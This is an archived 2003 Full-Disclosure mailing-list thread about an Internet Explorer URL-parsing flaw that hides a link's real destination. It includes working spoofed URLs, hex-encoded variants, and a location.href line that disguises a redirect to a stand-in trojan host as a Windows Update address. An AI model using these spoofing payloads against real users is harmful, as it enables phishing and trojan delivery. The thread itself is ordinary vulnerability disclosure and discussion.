lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <005601c3bf11$990e3420$6e01a8c0@cmp.ind.br>
From: cleber.souza at cmp.ind.br (Cleber P. de Souza)
Subject: RES: RE: FWD: Internet Explorer URL parsing vulnerability

follow the link

http://www.microsoft.com%01:www.linux.org%01@....freebsd.org/

The IE will redirect you to www.freebsd.org <http://www.freebsd.org/> .

Its mean to be a fall at IE authentication method, used for automatically to
connect to sites that require authentication.

 

 

***

Cleber P. de Souza

Cia. Metalgraphica Paulista

 

-----Mensagem original-----
De: full-disclosure-admin@...ts.netsys.com
[mailto:full-disclosure-admin@...ts.netsys.com] Em nome de VeNoMouS
Enviada em: quarta-feira, 10 de dezembro de 2003 02:03
Para: Julian HO Thean Swee; full-disclosure@...ts.netsys.com
Assunto: Re: [Full-Disclosure] RE: FWD: Internet Explorer URL parsing
vulnerability

 

umm tested this you dont need %01 either btw.

 

www.microsoft.com@....linux.org

 

was messing around with some hex stile as well is there a way to call a
file:// inside a http:// becos the issue with doing the @ trick is it
appends http:// automaticly, mind you , u could just make it exec some vb
code or something on a site, just a random idea any way

 

and it dont also seem to work if you use hex as well for the full domain ie

 

www.microsoft.com%40%77%77%77%2E%6C%69%6E%75%78%2E%6F%72%67

 

nor  www.microsoft.com%40www.linux.org

 

where as if you www.microsoft.com@...%77%77%2E%6C%69%6E%75%78%2E%6F%72%67
works

 

 

 

 

 

 

----- Original Message ----- 

From: Julian HO Thean Swee <mailto:jho@...rhub.com>  

To: 'full-disclosure@...ts.netsys.com' 

Sent: Wednesday, December 10, 2003 4:22 PM

Subject: [Full-Disclosure] RE: FWD: Internet Explorer URL parsing
vulnerability

 

Hmm, it doesn't seem to work on my browser :) 
I don't even get transported to any page when i click the button. 
But then again, i have everything turned off in the internet zone by
default... 
(but my submit non-encrypted form data is on) 

Does it really work then?  it looks like it's using javascript...?
(location.href) 
Merry Christmas everyone :) 

--__--__-- 

Message: 1 
Date: Tue, 9 Dec 2003 10:22:59 -0800 (PST) 
From: S G Masood <sgmasood@...oo.com> 
To: full-disclosure@...ts.netsys.com 
Subject: [Full-Disclosure] RE: FWD: Internet Explorer URL parsing
vulnerability 

 

LOL. This is so simple and dangerous, it almost made 
me laugh and cry at the same time. Most of you will 
realise why...;D 
The Paypal, AOL, Visa, Mastercard, et al email 
scammers will have a harvest of gold this month with 
lots of zombies falling for this simple technique. 

># POC ########## 
>http://www.zapthedingbat.com/security/ex01/vun1.htm 

Dont be surprised if your latest download from 
http://www.microsoft.com turns out to be a trojan! 

location.href=unescape('http://windowsupdate.microsoft.com%01@...edownloadan
eviltrojanfromme.com); 

 

-- 
S.G.Masood 

Hyderabad, 
India 

PS: One more thing - no scripting required to exploit this. 

__________________________________ 
Do you Yahoo!? 
Free Pop-Up Blocker - Get it now 
http://companion.yahoo.com/ 

 

This email is confidential and privileged.  If you are not the intended
recipient, you must not view, disseminate, use or copy this email. Kindly
notify the sender immediately, and delete this email from your system. Thank
you.

Please visit our website at www.starhub.com 

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20031210/5e4aa361/attachment.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ